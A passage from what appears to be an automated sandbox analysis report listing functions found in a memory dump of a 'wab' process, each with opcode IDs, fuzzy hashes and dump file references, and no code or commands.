                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: B501DF322009849FD3128BD9DD44F2677DCEF44780F0900A3F904EB6A1DAB8DDA1D621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020826B Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4393693aa2a3334fd4a5ce15c9eeb6c93f9c303d2a7a7fe44c01c171d87c9da
                                                              • Instruction ID: c4a65e98cb89dae7f2dcebfd10fbe4c26944df4c618978d50fee503b3644f795
                                                              • Opcode Fuzzy Hash: c4393693aa2a3334fd4a5ce15c9eeb6c93f9c303d2a7a7fe44c01c171d87c9da
                                                              • Instruction Fuzzy Hash: E501A735711A48DFC714DFE6DC41AAFB7BAAF90320B25406BAE01A7644DE30ED11CA94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CF367 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 805a1fb59c720a3f8e5a99b39e098cd89f79e7653828df670582ee6dfc01cfdd
                                                              • Instruction ID: 2f1e60da4a8b454634b4fb4c2da71f03599596e198cd5af43578ee6b564d4764
                                                              • Opcode Fuzzy Hash: 805a1fb59c720a3f8e5a99b39e098cd89f79e7653828df670582ee6dfc01cfdd
                                                              • Instruction Fuzzy Hash: E6018F71A11258ABDB14DFE9DC46FAFBBB8EF94704F004067B500EB280D6B4E914CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20212582 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e3c825c4c119490e4bbd6277f6ac5214a1829e969f27ced3772823a4ae82dc0
                                                              • Instruction ID: 8d53d6d24b24551303a09b0c65cdae0e45bc689a941c7ed22c0415d56a22f2ee
                                                              • Opcode Fuzzy Hash: 1e3c825c4c119490e4bbd6277f6ac5214a1829e969f27ced3772823a4ae82dc0
                                                              • Instruction Fuzzy Hash: 7AF0F932601A24BBC735CFD69D80F47BAEEEB84A90F11402AF60497641D630ED51DEA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E5060 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1093d1d1d42c406618dde11eb549d1463ee550de89f7136e994a4af3def215e9
                                                              • Instruction ID: 70ffd641b754809ca684ffe87be1ec37cd606722ef34f6594c58f2b80f41ed19
                                                              • Opcode Fuzzy Hash: 1093d1d1d42c406618dde11eb549d1463ee550de89f7136e994a4af3def215e9
                                                              • Instruction Fuzzy Hash: 48017C71A11219AFCB04DFA9D981AEEBBB8EF48304F50405BF904F7381D634AA118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023C073 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: 9d240b9f2f453d03a796e567152de225d1340faea09b4e684d737246217ff2ab
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: 77F0C2F2600A11ABD328CF8DDC41F67B7EEDBD0A80F158169A605DB220EA31ED04CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E50D9 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82230f9488c410d0fae3b9184694c44e9fd3cd5a2db203df8189cfbc560097aa
                                                              • Instruction ID: 1fc76ff76ae161d52e209a21ccd393844f293c8433e116c5e420e13ee68c8c89
                                                              • Opcode Fuzzy Hash: 82230f9488c410d0fae3b9184694c44e9fd3cd5a2db203df8189cfbc560097aa
                                                              • Instruction Fuzzy Hash: 35012CB5A11219AFCB04CFA9DD81ADEBBF8EF58304F50405BF504F7391D674A9118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E5152 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f98fe84717d0131a79285be11e89719f97d9b270c1c8651bf9e3873d96cf6ec
                                                              • Instruction ID: ce14a823e6a32d9b41965d8d896b2ce5fed8294396706e24e49c1665a86271ef
                                                              • Opcode Fuzzy Hash: 0f98fe84717d0131a79285be11e89719f97d9b270c1c8651bf9e3873d96cf6ec
                                                              • Instruction Fuzzy Hash: B4012C71A11219AFDB04CFA9DD81ADEBBB8FF58304F50405BF904F7391D674AA118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020C310 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: 835c83f3bd086193861949cede434ca73c65ae331d42b10f41055e6dd73bebd9
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: 53F0C8B3215B229BD7220BD94C40F1BA6978FF5B64F355077F2049B200C974DC25AAD1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E5537 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18625d3cf7dea3f350c36a8ac407e7a113aa38dab6cb301a317b67d17455ace7
                                                              • Instruction ID: a7c1892500e883358c2a7565235cce3281e84e06d41b8d3711d0091515ca1cdd
                                                              • Opcode Fuzzy Hash: 18625d3cf7dea3f350c36a8ac407e7a113aa38dab6cb301a317b67d17455ace7
                                                              • Instruction Fuzzy Hash: C5110C70A10259DFDB04DFA9D941B9EBBF4BF08204F544266E508EB382E634E9458B54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E61E5 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f1855d86b660d4d6bf89c17c3c1d193aaf7eac6d6bacbebfbb21fa46fe12faa
                                                              • Instruction ID: 676a155bfcc69b4ac08d79d7f8819b5f8750a8912a4ea0e9c8d6bd901f8a7392
                                                              • Opcode Fuzzy Hash: 9f1855d86b660d4d6bf89c17c3c1d193aaf7eac6d6bacbebfbb21fa46fe12faa
                                                              • Instruction Fuzzy Hash: D8018F71A512499FCB04CFE9D945BDEBBB8AF58314F14005AF904A7280D774EA11CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CF2F8 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c132e4ebd61478bb53abbdce8664a8dbc971cb4a1ed93d8c29ff33842f5890f
                                                              • Instruction ID: d45100329d545893a168c664db09da51302e9dec413116c67bb9e0be7943cc7f
                                                              • Opcode Fuzzy Hash: 9c132e4ebd61478bb53abbdce8664a8dbc971cb4a1ed93d8c29ff33842f5890f
                                                              • Instruction Fuzzy Hash: 8EF0A472A11648ABDB04DFF9C945ADEBBB8EF44710F008097F501E7290DA74E9158B64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024724D Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                              • Instruction ID: 8215e5029faa3aeffb9ea3618ede2882b9349d04ac3f762e44d6fcbfcea55a60
                                                              • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                              • Instruction Fuzzy Hash: DDF04671F026566BFB08CBE88D00FABBBB8AF80610F048197BE1097540E670EE60C690
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2029A4B0 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14e83a006e0258f24228e87cc168123c1f5e5e274a12984db44462f614507c7c
                                                              • Instruction ID: f7dcd2ab29c25afd0dc119b8f89e8612811d513479cabbd660b77622d4db6b46
                                                              • Opcode Fuzzy Hash: 14e83a006e0258f24228e87cc168123c1f5e5e274a12984db44462f614507c7c
                                                              • Instruction Fuzzy Hash: FD01493661125DABCF129F84CC40EDA3B66FB4C764F168112FE1866220C636D971EF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020C0F0 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2dc52c52569e95abb2878326e912df4894fd1a105459815476348737f719b3aa
                                                              • Instruction ID: 63111bd9bbbf4f2161813b5fbd4683ed665433424317779c2e97b55733fa40cc
                                                              • Opcode Fuzzy Hash: 2dc52c52569e95abb2878326e912df4894fd1a105459815476348737f719b3aa
                                                              • Instruction Fuzzy Hash: B5F0F0B12043025BF3149B969C42F22B697EBE0650F35902BEB0C8B2C2E971DD658694
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E53FC Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7703e47c3e9d942ba85b0ec02a4102d75df547eaff10c15b2a242b99d1d2963
                                                              • Instruction ID: 49112cf4fa0dc9a788065309dcd992d41b5e146defff00f014aa6e37131be873
                                                              • Opcode Fuzzy Hash: a7703e47c3e9d942ba85b0ec02a4102d75df547eaff10c15b2a242b99d1d2963
                                                              • Instruction Fuzzy Hash: B4011E70A112099FDB08DFA9D945B9EF7F4FF08304F508166A519EB381E674AA448F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024656A Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9780bd3ff1f9d609e848352a73f19e12a995784addf0c99db931138d1c043a7e
                                                              • Instruction ID: 5837ed726f9b87a77965062b824781c2e763b5e63e4f257f0d53e581b63acd3c
                                                              • Opcode Fuzzy Hash: 9780bd3ff1f9d609e848352a73f19e12a995784addf0c99db931138d1c043a7e
                                                              • Instruction Fuzzy Hash: E101A474605A859FE3168FE8CD4DF1637E8BB40B44F940193BA008BAE6D76CED218521
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202B437C Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: 7fe340adbea04449acbb63122109fe1f698ef1c8771ed0f4338af1bd02ef5891
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: 6FF0E935341F2347D7169EE99CA0B2E62D59FF0980F2505AFA615CB640DF20EDB18B80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202092FF Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71313f56697ee6cfcbb35f463038a2bff3c97a74a2f8c43dbb222c98f2a8995d
                                                              • Instruction ID: ad92149a32c41ef02144e84a3321e2b788cbaf48eb8b9ae26c3822cb5fcf530d
                                                              • Opcode Fuzzy Hash: 71313f56697ee6cfcbb35f463038a2bff3c97a74a2f8c43dbb222c98f2a8995d
                                                              • Instruction Fuzzy Hash: BEF0F032200740AFC3319F89CD05F8ABBEEEFA4710F08015AF542A3090C6A0B904CA50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CF3E6 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a9bb177192d42b7b87cc99ec5c7259c2dfee0ebc6f8f37df3ccf048ad9fc627
                                                              • Instruction ID: 9927e9558a490edffd0541dd598034a5963a9dbc010e24c378997cfb870f65e1
                                                              • Opcode Fuzzy Hash: 0a9bb177192d42b7b87cc99ec5c7259c2dfee0ebc6f8f37df3ccf048ad9fc627
                                                              • Instruction Fuzzy Hash: C0F0AF70A01208EFCB08DFE8D945B9EBBF4EF08300F50406AB904EB381E674EA10CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E55C9 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4db84086486ec741eb958d38da79b5a05d7b831b66ea8817d983d2538c8a03d
                                                              • Instruction ID: 5e68063f0fd918ab77d4c45ce73b3e8e912fe49e4679a954d92361154834c2ef
                                                              • Opcode Fuzzy Hash: b4db84086486ec741eb958d38da79b5a05d7b831b66ea8817d983d2538c8a03d
                                                              • Instruction Fuzzy Hash: 0FF04F74A11249AFCB04DFA9DA45B9EBBF8EF18304F50445AB905EB381E674EA10CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202D0115 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2617b5b3c7b88ba42bae9a6b9e6d22a03adb6cfd37df2b626416f5a7b577752b
                                                              • Instruction ID: 75ed46e67dba6f0fa6e462c90d7e899b9dfc39a19121a591ae656bbfd4b40cdb
                                                              • Opcode Fuzzy Hash: 2617b5b3c7b88ba42bae9a6b9e6d22a03adb6cfd37df2b626416f5a7b577752b
                                                              • Instruction Fuzzy Hash: CFF05C3741FBD54ACB134FB86CD13C12B5A9791210F06104BD4A557325C67CEDA3D620
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E5283 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1afcc383d32c2d758532f3d3176cee39dc9168bf5cb451a6392f7fd37fabc951
                                                              • Instruction ID: 966e408b5745d50db30ae25a873eba066727cea5d319fa6618cac6a01827b27c
                                                              • Opcode Fuzzy Hash: 1afcc383d32c2d758532f3d3176cee39dc9168bf5cb451a6392f7fd37fabc951
                                                              • Instruction Fuzzy Hash: BDF0B470A606089FCB08DFF5DD42FAEB7B8BF54304F50445AB900EB281EA34E9008B54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E52E2 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
